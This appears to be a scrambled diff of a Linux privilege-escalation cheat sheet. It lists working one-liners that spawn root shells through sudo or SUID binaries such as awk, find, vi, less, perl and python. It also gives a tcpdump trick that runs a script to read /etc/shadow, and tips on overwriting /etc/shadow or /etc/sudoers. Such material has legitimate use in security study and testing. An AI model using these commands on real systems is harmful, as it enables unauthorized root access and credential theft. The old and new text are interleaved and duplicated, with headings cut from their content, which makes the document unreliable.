Updates privilege_escalation_-_linux.md

### Weak/reused/plaintext passwords

- Check database config-file (`config.php` or similar)

- Check databases

- Check weak passwords

netstat -ano

```

### Suid Misconfiguration

### Suid and Guid Misconfiguration

A binary with suid permission can be run by anyone, but when they are run they are run as the user who set the suid. It could be root, or another user. If the suid-bit is set on a program that can spawn a shell or in another way abuse the rights.

For example, these are some programs that can be used to spawn a shell:

## Communication

```

nmap

vim

less

more

```

### Mail

If these programs have suid-bit set we can use them to escalate privileges too. For more of these and how to use the see the next section about abusing sudo-rights:

```

/var/spool/mail

nano

cp

mv

find

```

## Logs

**Find suid and guid files**

## References

[http://www.rebootuser.com/?p=1758](http://www.rebootuser.com/?p=1758)

```

#Find SUID

find / -perm -u=s -type f 2>/dev/null

[http://netsec.ws/?p=309](http://netsec.ws/?p=309)

#Find GUID

find / -perm -g=s -type f 2>/dev/null

```

# Privilege Escalation - Linux

### Abusing sudo-rights

### Weak or reused passwords

If you have a limited shell that access to some sudo programs you might be able to escalate your privileges with it. Any program that can write or overwrite can be used. If you have `cp` you can overwrite `/etc/shadow` or `/etc/sudoers`.

If there is a web-server, check the connection to the database. Try that password. Also log into the database with the user you found. Is there a admin-account that might be reusing passwords?

Config-files  

postfix  

newsbeauter

`awk`

### Configuration mistakes

```

awk 'BEGIN {system("/bin/bash")}'

```

`bash`

#### Bad path configuration

`cp`  

Copy and overwrite /etc/shadow

Putting . in the path  

If you put a dot in your path you won't have to write `./binary to be able to execute it. You will be able to execute any script or binary that is in the current directory.`

`find`

Why do people/sysadmins do this? Because they are lazy and won't want to write `./.`

```bash

sudo find / -exec bash -i \;

This explains it  

[https://hackmag.com/security/reach-the-root/](https://hackmag.com/security/reach-the-root/)  

And here  

[http://www.dankalia.com/tutor/01005/0100501004.htm](http://www.dankalia.com/tutor/01005/0100501004.htm)

find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;

```

#### **Cronjob**

`ht`  

The text/binary-editor HT.

With privileges running script that are editable for other users.

`less`

From less you can go into vi, and then into a shell

#### World writable scripts invoked as root

```

sudo less /etc/shadow

v

:shell

```

World/user writable scripts that are invoked by root can me rewritten to escalate privileges.

`more`  

Also check scripts that are called by these scripts.

You need to run more on a file that is bigger than your screen.

```

#World writable files directories

find / -writable -type d 2>/dev/null

find / -perm -222 -type d 2>/dev/null

find / -perm -o w -type d 2>/dev/null

# World executable folder

find / -perm -o x -type d 2>/dev/null

# World writable and executable folders

find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

sudo more /home/pelle/myfile

!/bin/bash

```

#### World/user writable binaries

`mv`

Overwrite `/etc/shadow` or `/etc/sudoers`

#### Weak permissions on LD\_preload

`man`

[https://blog.maleadt.net/2015/02/25/sudo-escalation/](https://blog.maleadt.net/2015/02/25/sudo-escalation/)

`nano`

#### Homemade crappy suid programs

`nc`

**SUID files**

`nmap`

SUID is a bit that you can set on a file. If you run a binary the binary is run as the user who is running it. But if the binary has the SUID-bit it will be run as the owner of that binary. This can be abused.

Here is how you find SUID files:

`python/perl/ruby/lua/etc`

```

find / -perm -u=s -type f 2>/dev/null

sudo perl

exec "/bin/bash";

ctr-d

```

Run ltrace on them to see what they do.

#### Setuid/setuig

SUID is a bit that you can set on a file. If you run a binary the binary is run as the user who is running it. But if the binary has the SUID-bit it will be run as the owner of that binary. This can be abused.  

Any editor with a setudi/setuig can be abused.

```

sudo python

import os

os.system("/bin/bash")

```

**nmap**  

SUID on nmap.

`sh`

Find them

`tcpdump`

```

#Find SUID

find / -perm -u=s -type f 2>/dev/null

#Find GUID

find / -perm -g=s -type f 2>/dev/null

echo $'id\ncat /etc/shadow' > /tmp/.test

chmod +x /tmp/.test

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

```

### Abusing sudo-rights

If you have a shell that has limited sudo programs you might still be able to use it. Any program that can write or overwrite can be used. If you have `cp you can overwrite /etc/shadow or /etc/sudoers.   

`**`ht`**`  

The text/binary-editor HT running as sudo`

**nano**

`vi/vim`

**vi/vim**  

With vi it is even easier. Just open vi

Can be abused like this:

```

sudo vi

:set shell=/bin/bash:shell    

:!bash

```

``

And you have shell.

[How I got root with sudo/](https://www.securusglobal.com/community/2014/03/17/how-i-got-root-with-sudo/)

**less**  

From less you can go into vi, and then into a shell

```

sudo less /etc/shadow

v

:shell

```

## Communication

**more**  

You need to run more on a file that is bigger than your screen.

### Mail

```

sudo more /home/pelle/myfile

!/bin/bash

/var/spool/mail

```

**cp**  

Copy and overwrite /etc/shadow

## Logs

**mv**  

Overwrite /etc/shadow or /etc/sudoers

## References

**find**

[http://www.rebootuser.com/?p=1758](http://www.rebootuser.com/?p=1758)

```

sudo find / -exec bash -i \;

[http://netsec.ws/?p=309](http://netsec.ws/?p=309)

find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;

```

# Privilege Escalation - Linux

**python/perl/ruby/lua/etc**

```

sudo perl

exec "/bin/bash";

ctr-d

```

### Configuration mistakes

```

sudo python

import os

os.system("/bin/bash")

```

**nmap**

#### Bad path configuration

**awk**

Putting . in the path  

If you put a dot in your path you won't have to write `./binary to be able to execute it. You will be able to execute any script or binary that is in the current directory.`

```

awk 'BEGIN {system("/bin/bash")}'

```

Why do people/sysadmins do this? Because they are lazy and won't want to write `./.`

**bash**

This explains it  

[https://hackmag.com/security/reach-the-root/](https://hackmag.com/security/reach-the-root/)  

And here  

[http://www.dankalia.com/tutor/01005/0100501004.htm](http://www.dankalia.com/tutor/01005/0100501004.htm)

**sh**

#### **Cronjob**

**man**

With privileges running script that are editable for other users.

#### World writable scripts invoked as root

World/user writable scripts that are invoked by root can me rewritten to escalate privileges.

**nc**

Also check scripts that are called by these scripts.

**netcat**

```

#World writable files directories

find / -writable -type d 2>/dev/null

find / -perm -222 -type d 2>/dev/null

find / -perm -o w -type d 2>/dev/null

**ruby**

# World executable folder

find / -perm -o x -type d 2>/dev/null

**lua**

# World writable and executable folders

find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

```

**irb**

#### World/user writable binaries

**tcpdump**

#### Weak permissions on LD\_preload

[https://www.securusglobal.com/community/2014/03/17/how-i-got-root-with-sudo/](https://www.securusglobal.com/community/2014/03/17/how-i-got-root-with-sudo/)

[https://blog.maleadt.net/2015/02/25/sudo-escalation/](https://blog.maleadt.net/2015/02/25/sudo-escalation/)

```

echo $'id\ncat /etc/shadow' > /tmp/.test

chmod +x /tmp/.test

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

```

**emacs**

### Software vulnerabilites